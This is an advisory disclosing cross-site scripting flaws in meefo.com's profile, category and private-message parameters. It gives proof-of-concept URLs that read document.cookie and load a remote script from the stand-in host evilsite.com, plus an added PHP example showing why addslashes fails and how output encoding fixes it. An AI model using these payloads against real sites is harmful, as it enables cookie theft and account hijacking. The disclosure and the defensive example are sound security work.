Meefo.com - XSS with cookie include
Meefo.com
Homepage:
http://meefo.com
Affected files:
reading profiles
index.php
input boxes on profiles
sending private msgs
------------------------------
Reading a profile, with cookie include PoC:
Since data isn't properly filtered (backslashes are added to ' and "), a user
can input malicious data, such as
<script>alert(document.cookie)</script>, and it will pop up with the user's cookie.
Included at the end of this article are
screenshots of the cookie vuln. Screenshots meefo4 and meefo5.jpg show this.
http://meefo.com/?do=rdprof&user_pp=username<script>alert(document.cookie)</script>
When editing your profile, data isn't properly filtered in the input boxes
either, so <script>alert(document.cookie)</script> works here too.
Another XSS Vulnerability example:
http://meefo.com/?do=rdprof&user_pp=<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>
Reading categories XSS Vuln:
http://meefo.com/index.php?cat=Poetry<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>
Sending PM's XSS Vuln:
http://meefo.com/?messages=send&to=<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>
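Added example (not Meefo's code, and not part of the original advisory): why adding
backslashes to ' and " does not stop the payloads above, next to output encoding that does.
It assumes the site behaves like PHP's addslashes(); the function names and the username
rule are hypothetical.

```php
<?php
// Added example, not Meefo's code. Function names and the username rule are hypothetical.

// Mimics the behaviour the advisory reports: quotes get backslashes, markup passes through.
function render_vulnerable(string $value): string {
    return '<h1>Profile of ' . addslashes($value) . '</h1>';
}

// Output encoding for an HTML text or attribute context: < > & " ' become entities.
function render_hardened(string $value): string {
    $safe = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h1>Profile of ' . $safe . '</h1>';
}

// Allowlist validation (assumed rule: 1-32 letters, digits or underscore).
function valid_username(string $value): bool {
    return preg_match('/\A[A-Za-z0-9_]{1,32}\z/', $value) === 1;
}

// Constructed inputs: the payloads quoted in the advisory plus benign and quoted values.
$samples = [
    'username',
    'username<script>alert(document.cookie)</script>',
    '<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>',
    "o'brien\"<script>",
];

foreach ($samples as $s) {
    $v = render_vulnerable($s);
    $h = render_hardened($s);
    printf("input: %s\n", $s);
    printf("  addslashes output keeps a script tag: %s\n",
        stripos($v, '<script') !== false ? 'yes' : 'no');
    printf("  encoded output keeps a script tag:    %s\n",
        stripos($h, '<script') !== false ? 'yes' : 'no');
    printf("  passes username allowlist:            %s\n",
        valid_username($s) ? 'yes' : 'no');
    printf("  encoded: %s\n\n", $h);
}

// Defence in depth: a session cookie set with the HttpOnly flag is not
// readable through document.cookie, which limits what an injected script can take.
```

The same encoding applies to every parameter listed above (user_pp, cat, to) and to the
profile input boxes, at the point where the value is written into the page.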
Screenshots of cookie include vulns & more:
http://www.youfucktard.com/xsp/meefo1.jpg
http://www.youfucktard.com/xsp/meefo2.jpg
http://www.youfucktard.com/xsp/meefo3.jpg
http://www.youfucktard.com/xsp/meefo4.jpg
http://www.youfucktard.com/xsp/meefo5.jpg
http://www.youfucktard.com/xsp/meefo6.jpg